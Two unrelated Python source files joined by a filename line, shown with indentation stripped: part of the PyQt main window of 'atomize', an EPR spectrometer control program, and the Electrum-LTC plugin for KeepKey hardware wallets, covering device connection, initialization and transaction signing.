yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline)
elif operation == 'append_xy':
label = meta['label']
xs, ys = pw.get_data(label)
xn, yn = meta['value']
new_xs = list(xs)
new_xs.append(xn)
new_ys = list(ys)
new_ys.append(yn)
pw.plot(new_xs, new_ys, parametric=True, name=label, scatter='False')
elif operation == 'append_z':
image = pw.get_data()
if image is None:
image = np.array([arr])
else:
try:
image = np.vstack((np.transpose(image), [arr]))
except ValueError:
image = np.array([arr])
start_step = meta['start_step']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
znam = meta['Zname']
zscal = meta['Z']
if start_step is not None:
(x0, dx), (y0, dy) = start_step
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
pw.setImage(image, pos=(x0, y0), scale=(dx, dy), axes={'y':0, 'x':1})
else:
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal)
pw.setImage(image, axes={'y':0, 'x':1})
elif operation == 'label':
pw.setTitle(meta['value'])
def add_new_plot(self, rank, name):
pw = widgets.get_widget(rank, name)
self.add_plot(pw)
self.namelist[name] = pw
return pw
def add_plot(self, pw):
self.insert_dock_right = not self.insert_dock_right
self.dockarea.addDock(pw, position=['bottom', 'bottom'][self.insert_dock_right])
#print(['bottom', 'right'][self.insert_dock_right])
#self.dockarea.moveDock(pw, 'above', self.dock_list[-1]) ## move d6 to stack on top of d4
#####################################################
def _on_destroyed(self):
"""
A function to do some actions when the main window is closing.
"""
self.process_python.close()
self.process_pulse.close()
self.process_osc.close()
self.process_dig.close()
self.process_mw.close()
self.process_temp.close()
self.process_t2.close()
self.process_t1.close()
self.process_echo.close()
self.process_laser.close()
self.process_eseem.close()
self.process_tune.close()
self.process_awg.close()
self.process_fft.close()
self.process_phasing.close()
self.process_awg_phasing.close()
def quit(self):
"""
A function to quit the program.
"""
self.process_python.terminate()
self.process_pulse.terminate()
self.process_osc.terminate()
self.process_dig.terminate()
self.process_mw.terminate()
self.process_temp.terminate()
self.process_t2.terminate()
self.process_t1.terminate()
self.process_echo.terminate()
self.process_laser.terminate()
self.process_eseem.terminate()
self.process_tune.terminate()
self.process_awg.terminate()
self.process_fft.terminate()
self.process_phasing.terminate()
self.process_awg_phasing.terminate()
sys.exit()
####
#### QProcess: Destroyed while process ("python3") is still running.
####
def clear_errors(self):
self.text_errors.clear()
def start_experiment(self):
"""
A function to run an experimental script with the configured Python interpreter.
"""
if self.script != '':
stamp = os.stat(self.script).st_mtime
else:
self.text_errors.appendPlainText('No experimental script is opened')
return
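# checkState() == 2 is Qt.Checked, i.e. the checkTests checkbox is ticked.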
if self.checkTests.checkState() == 2:
self.test()
exec_code = self.process.waitForFinished( msecs = self.test_timeout ) # timeout in msec
elif self.checkTests.checkState() == 0:
self.test_flag = 0
exec_code = True
self.text_errors.appendPlainText("Testing of experimental scripts are disabled")
if self.test_flag == 1:
self.text_errors.appendPlainText("Experiment cannot be started, since test is not passed. Test execution timeout is " +\
str( self.test_timeout / 60000 ) + " minutes")
return # stop current function
elif self.test_flag == 0 and exec_code == True:
self.process_python.setArguments([self.script])
self.process_python.start()
def start_awg_phasing(self):
"""
A function to run online awg phase cycling.
"""
self.process_awg_phasing.setArguments(['atomize/control_center/awg_phasing.py'])
self.process_awg_phasing.start()
def start_phasing(self):
"""
A function to run online phase cycling.
"""
self.process_phasing.setArguments(['atomize/control_center/phasing.py'])
self.process_phasing.start()
def start_fft_control(self):
"""
A function to run the FFT analyzer control.
"""
self.process_fft.setArguments(['atomize/control_center/fft_control.py'])
self.process_fft.start()
def start_awg_control(self):
"""
A function to run the AWG pulse creator.
"""
self.process_awg.setArguments(['atomize/control_center/awg_creator.py'])
self.process_awg.start()
def start_pulse_control(self):
"""
A function to run the pulse creator.
"""
self.process_pulse.setArguments(['atomize/control_center/pulse_creator.py'])
self.process_pulse.start()
def start_osc_control(self):
"""
A function to run the oscilloscope control.
"""
self.process_osc.setArguments(['atomize/control_center/osc_control.py'])
self.process_osc.start()
def start_dig_control(self):
"""
A function to run the digitizer control.
"""
self.process_dig.setArguments(['atomize/control_center/dig_control.py'])
self.process_dig.start()
def start_mw_control(self):
"""
A function to run the MW bridge control.
"""
self.process_mw.setArguments(['atomize/control_center/mw_bridge_control.py'])
self.process_mw.start()
def start_temp_control(self):
"""
A function to run the temperature control.
"""
self.process_temp.setArguments(['atomize/control_center/temp_control.py'])
self.process_temp.start()
def start_t2_preset(self):
self.process_t2.setArguments(['atomize/control_center/t2_preset.py'])
self.process_t2.start()
def start_t1_preset(self):
self.process_t1.setArguments(['atomize/control_center/t1_preset.py'])
self.process_t1.start()
def start_laser_preset(self):
self.process_laser.setArguments(['atomize/control_center/laser_preset.py'])
self.process_laser.start()
def start_echo_preset(self):
self.process_echo.setArguments(['atomize/control_center/echo_det_preset.py'])
self.process_echo.start()
def start_eseem_preset(self):
self.process_eseem.setArguments(['atomize/control_center/eseem_preset.py'])
self.process_eseem.start()
def start_tune_preset(self):
self.process_tune.setArguments(['atomize/control_center/tune_preset.py'])
self.process_tune.start()
def script_open_combo(self):
self.script = self.text_to_script_name( self.script_chooser.currentText() )
self.open_file( self.script )
def text_to_script_name(self, text_to_parse):
if text_to_parse == ' Tuning':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/01_resonator_tuning.py')
elif text_to_parse == ' T2':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/02_t2.py')
elif text_to_parse == ' T2 Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/02_t2_baseline.py')
elif text_to_parse == ' T1 Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/04_t1_inversion_recovery.py')
elif text_to_parse == ' T1':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/04_t1_inversion_recovery_baseline.py')
elif text_to_parse == ' Echo Detected':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum.py')
elif text_to_parse == ' Echo Detected 2D':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum_baseline_2d.py')
elif text_to_parse == ' Echo Detected Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum_baseline.py')
elif text_to_parse == ' Laser ED':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline.py')
elif text_to_parse == ' Laser ED 2D':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline_2D.py')
elif text_to_parse == ' Laser Kinetics':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline_kinetics.py')
elif text_to_parse == ' ESEEM':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/07_eseem_phase.py')
elif text_to_parse == ' Nutations':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/05_nutations.py')
elif text_to_parse == ' HYSCORE':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/08_hyscore.py')
elif text_to_parse == ' SIFTER':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/10_sifter.py')
elif text_to_parse == ' DQC':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/11_dqc.py')
elif text_to_parse == ' DEER':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/awg/digitizer/02_deer_64_steps_phase_8ns_cylces.py')
elif text_to_parse == ' DEER Static':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/awg//01_deer_static.py')
def message_box_clicked(self, btn):
"""
Message box for a warning.
"""
if btn.text() == "Discrad and Run Experiment":
self.start_experiment()
elif btn.text() == "Update Script":
self.reload()
else:
return
def test(self):
"""
A function to run a script check.
"""
if self.script != '':
stamp = os.stat(self.script).st_mtime
else:
self.text_errors.appendPlainText('No experimental script is opened')
return
if stamp != self.cached_stamp and self.flag_opened_script_changed == 1:
self.cached_stamp = stamp
message = QMessageBox(self); # Message Box for warning of updated file
message.setWindowTitle("Your script has been changed!")
message.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78); }")
message.addButton(QtWidgets.QPushButton('Discard and Run Experiment'), QtWidgets.QMessageBox.YesRole)
message.addButton(QtWidgets.QPushButton('Update Script'), QtWidgets.QMessageBox.NoRole)
message.setText("Your experimental script has been changed ");
message.show();
message.buttonClicked.connect(self.message_box_clicked) # connect function clicked to button; get the button name
return # stop current function
#self.text_errors.appendPlainText("Testing... Please, wait!")
#self.process.setArguments(['--errors-only', self.script])
self.process.setArguments([self.script, 'test'])
self.process.start()
def reload(self):
"""
A function to reload an experimental script.
"""
self.cached_stamp = os.stat(self.script).st_mtime
text = open(self.script).read()
self.textEdit.setPlainText(text)
def on_finished_checking(self):
"""
A function to add the information about errors found during syntax checking
to a dedicated text box in the main window of the program.
"""
#text = self.process.readAllStandardOutput().data().decode()
#if text == '':
# self.text_errors.appendPlainText("No errors are found!")
#else:
# self.text_errors.appendPlainText(text)
# self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
# Version for real tests
text = self.process.readAllStandardOutput().data().decode()
text_errors_script = self.process.readAllStandardError().data().decode()
if text_errors_script == '':
# if text == '' and text_errors_script == '':
self.text_errors.appendPlainText("No errors are found")
self.test_flag = 0
elif text_errors_script != '':
self.test_flag = 1
self.text_errors.appendPlainText(text_errors_script)
#self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
def on_finished_script(self):
"""
A function to add the information about errors that occurred during script execution to a dedicated text box in the main window of the program.
"""
text = self.process_python.readAllStandardOutput().data().decode()
text_errors_script = self.process_python.readAllStandardError().data().decode()
if text_errors_script == '':
#if text == '' and text_errors_script == '':
self.text_errors.appendPlainText("Script done!")
elif text_errors_script != '':
self.text_errors.appendPlainText("Script done!")
self.text_errors.appendPlainText(text_errors_script)
#self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
def help(self):
"""
A function to open the documentation.
"""
pass
def edit_file(self):
"""
A function to open an experimental script in a text editor.
"""
if self.system == 'Linux':
if self.editor =='nano':
self.process_text_editor.setArguments(['-e','nano', self.script])
elif self.editor == 'vi':
self.process_text_editor.setArguments(['-e','vi', self.script])
else:
self.process_text_editor.setArguments([self.script])
elif self.system == 'Windows':
self.process_text_editor.setArguments([self.script])
self.process_text_editor.start()
def open_file(self, filename):
"""
A function to open an experimental script.
:param filename: string
"""
self.cached_stamp = os.stat(filename).st_mtime
text = open(filename).read()
self.path = os.path.dirname(filename) # for memorizing the path to the last used folder
self.script = filename
self.textEdit.setPlainText(text)
# scroll to Experimental parameters
QtCore.QTimer.singleShot(0, lambda: self.textEdit.verticalScrollBar().setValue(9))
self.label_filename.setText( str( self.script ) )
def save_file(self, filename):
"""
A function to save a new experimental script.
:param filename: string
"""
with open(filename, 'w') as file:
file.write(self.textEdit.toPlainText())
self.cached_stamp = os.stat(filename).st_mtime
self.script = filename
def open_file_dialog(self):
"""
A function to open a new window for choosing an experimental script.
"""
filedialog = QFileDialog(self, 'Open File', directory = self.path, filter = "python (*.py)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
def save_file_dialog(self):
"""
A function to open a new window for choosing a name for a new experimental script.
"""
filedialog = QFileDialog(self, 'Save File', directory = self.path, filter = "python (*.py)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
filedialog.setAcceptMode(QFileDialog.AcceptSave)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.save_file)
filedialog.show()
def save_edited_text(self):
if self.script:
self.flag_opened_script_changed = 1
with open(self.script, 'w') as file:
file.write(self.textEdit.toPlainText())
self.cached_stamp = os.stat(self.script).st_mtime
else:
self.flag_opened_script_changed = 1
if self.textEdit.toPlainText() != '': # save file dialog will be opened after at least one character is added
self.save_file_dialog()
@QtCore.pyqtSlot(str)
def add_error_message(self, data):
"""
A function for adding an error message to a dedicated text box in the main window of the program;
this function runs when Helper.changedSignal is emitted.
:param data: string
"""
self.text_errors.appendPlainText(str(data))
if data == 'Script stopped':
#path_to_main = os.path.abspath(os.getcwd())
lib_path = os.path.join(self.path_to_main, 'atomize/general_modules', 'libspinapi.so')
lib_path2 = os.path.join(self.path_to_main, 'atomize/general_modules', 'spinapi64.dll')
if not os.path.exists(lib_path) and not os.path.exists(lib_path2):
self.process_python.close()
else:
# check on windows?!
import atomize.device_modules.PB_ESR_500_pro as pb_pro
pb = pb_pro.PB_ESR_500_Pro()
pb.pulser_stop()
self.process_python.terminate()
# AWG
hCard1 = spcm_hOpen (create_string_buffer (b'/dev/spcm0'))
spcm_dwSetParam_i32 (hCard1, SPC_M2CMD, M2CMD_CARD_STOP)
# clean up
spcm_vClose (hCard1)
hCard2 = spcm_hOpen (create_string_buffer (b'/dev/spcm1'))
spcm_dwSetParam_i32 (hCard2, SPC_M2CMD, M2CMD_CARD_STOP)
# clean up
spcm_vClose (hCard2)
###
class NameList(QDockWidget):
def __init__(self, window):
super(NameList, self).__init__('Current Plots:')
#directories
self.path_to_main = os.path.abspath( os.getcwd() )
# configuration data
path_config_file = os.path.join(self.path_to_main, 'atomize/config.ini')
config = configparser.ConfigParser()
config.read(path_config_file)
# directories
self.open_dir = str(config['DEFAULT']['open_dir'])
self.namelist_model = QStandardItemModel()
self.namelist_view = QListView()
self.namelist_view.setModel(self.namelist_model)
self.setWidget(self.namelist_view)
self.window = window
self.plot_dict = {}
self.namelist_view.doubleClicked.connect(self.activate_item)
self.namelist_view.setContextMenuPolicy(QtConst.ActionsContextMenu)
delete_action = QAction("Delete Selected", self.namelist_view)
###
pause_action = QAction("Stop Script", self.namelist_view)
delete_action.triggered.connect(self.delete_item)
pause_action.triggered.connect(self.pause)
self.namelist_view.addAction(delete_action)
self.namelist_view.addAction(pause_action)
open_action = QAction('Open 1D Data', self)
open_action.triggered.connect(self.file_dialog) #self.open_file_dialog_1
self.namelist_view.addAction(open_action)
open_action_2 = QAction('Open 2D Data', self)
open_action_2.triggered.connect(self.file_dialog_2d) #self.open_file_dialog_2
self.namelist_view.addAction(open_action_2)
def open_file(self, filename):
"""
A function to open 1d data.
:param filename: string
"""
file_path = filename
header_array = []
header = 0
file_to_read = open(filename, 'r')
for i, line in enumerate(file_to_read):
if i == header: break
temp = line.split("#")
header_array.append(temp)
file_to_read.close()
temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
data = np.transpose(temp)
name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
pw = self.window.add_new_plot(1, name_plot)
if len(data) == 2:
pw.plot(data[0], data[1], parametric = True, name = file_path, xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
elif len(data) == 3:
pw.plot(data[0], data[1], parametric = True, name = file_path + '_1', xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
pw.plot(data[0], data[2], parametric = True, name = file_path + '_2', xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_2', scatter = 'False')
def open_file_2d(self, filename):
"""
A function to open 2D data.
:param filename: string
"""
file_path = filename
header_array = []
header = 0
header_array = []
file_to_read = open(file_path, 'r')
for i, line in enumerate(file_to_read):
if i == header: break
temp = line.split("#")
header_array.append(temp)
file_to_read.close()
temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
data = temp
name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
pw = self.window.add_new_plot(2, name_plot)
pw.setAxisLabels(xname = 'X', xscale = 'Arb. U.',yname = 'X', yscale = 'Arb. U.',\
zname = 'X', zscale = 'Arb. U.')
pw.setImage(data, axes = {'y': 0, 'x': 1})
# unused
def open_file_dialog(self, directory = '', header = 0):
pass
# For Tkinter Open 1D; Unused
# file_path = self.file_dialog(directory = directory)
#header_array = [];
#file_to_read = open(file_path, 'r')
#for i, line in enumerate(file_to_read):
# if i is header: break
# temp = line.split("#")
# header_array.append(temp)
#file_to_read.close()
#temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
#data = np.transpose(temp)
#name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
#pw = self.window.add_new_plot(1, name_plot)
#if len(data) == 2:
# pw.plot(data[0], data[1], parametric = True, name = file_path, xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
#elif len(data) == 3:
# pw.plot(data[0], data[1], parametric = True, name = file_path + '_1', xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
# pw.plot(data[0], data[2], parametric = True, name = file_path + '_2', xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_2', scatter = 'False')
# unused
def open_file_dialog_2(self, directory = '', header = 0):
pass
# For Tkinter Open 2D; Unused
#file_path = self.file_dialog(directory = directory)
#header_array = []
#file_to_read = open(file_path, 'r')
#for i, line in enumerate(file_to_read):
# if i is header: break
# temp = line.split("#")
# header_array.append(temp)
#file_to_read.close()
#temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
#data = temp
#name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
#pw = self.window.add_new_plot(2, name_plot)
#pw.setAxisLabels(xname = 'X', xscale = 'Arb. U.',yname = 'X', yscale = 'Arb. U.',\
# zname = 'X', zscale = 'Arb. U.')
#pw.setImage(data, axes = {'y': 0, 'x': 1})
def file_dialog(self, directory = ''):
"""
A function to open a new window for choosing 1d data
"""
filedialog = QFileDialog(self, 'Open File', directory = self.open_dir, filter = "CSV (*.csv)", \
options = QtWidgets.QFileDialog.DontUseNativeDialog )
# options = QtWidgets.QFileDialog.DontUseNativeDialog
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
# Tkinter Open 1D data
#root = tkinter.Tk()
#s = ttk.Style().theme_use('alt')
#root.withdraw()
#file_path = filedialog.askopenfilename(**dict(
# initialdir = self.open_dir,
# filetypes = [("CSV", "*.csv"), ("TXT", "*.txt"),\
# ("DAT", "*.dat"), ("all", "*.*")],
# title = 'Select file to open')
# )
#return file_path
def file_dialog_2d(self, directory = ''):
"""
A function to open a new window for choosing 2D data
"""
filedialog = QFileDialog(self, 'Open File', directory = self.open_dir, filter = "CSV (*.csv)")
#options = QtWidgets.QFileDialog.DontUseNativeDialog
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file_2d)
filedialog.show()
def activate_item(self, index):
item = self.namelist_model.itemFromIndex(index)
plot = self.plot_dict[str(item.text())]
if plot.closed:
plot.closed = False
self.window.add_plot(plot)
def delete_item(self):
index = self.namelist_view.currentIndex()
item = self.namelist_model.itemFromIndex(index)
del self[str(item.text())]
def pause(self):
sock = socket.socket()
sock.connect(('localhost', 9091))
sock.send(b'Script stopped')
sock.close()
def __getitem__(self, item):
return self.plot_dict[item]
def __setitem__(self, name, plot):
model = QStandardItem(name)
model.setEditable(False)
self.namelist_model.appendRow(model)
self.plot_dict[name] = plot
def __contains__(self, value):
return value in self.plot_dict
def __delitem__(self, name):
self.namelist_model.removeRow(self.namelist_model.findItems(name)[0].index().row())
self.plot_dict[name].close()
del self.plot_dict[name]
def keys(self):
return list( self.plot_dict.keys() )
def main():
"""
A function to run the main window of the program.
"""
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
helper = socket_server.Helper()
server = socket_server.Socket_server()
# connect the add_error_message function so it runs when the helper emits its signal
helper.changedSignal.connect( main.add_error_message, QtCore.Qt.QueuedConnection )
threading.Thread( target = server.start_messenger_server, args = (helper,), daemon = True ).start()
main.show()
sys.exit( app.exec_() )
if __name__ == '__main__':
main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.plugin import Device
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
        return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
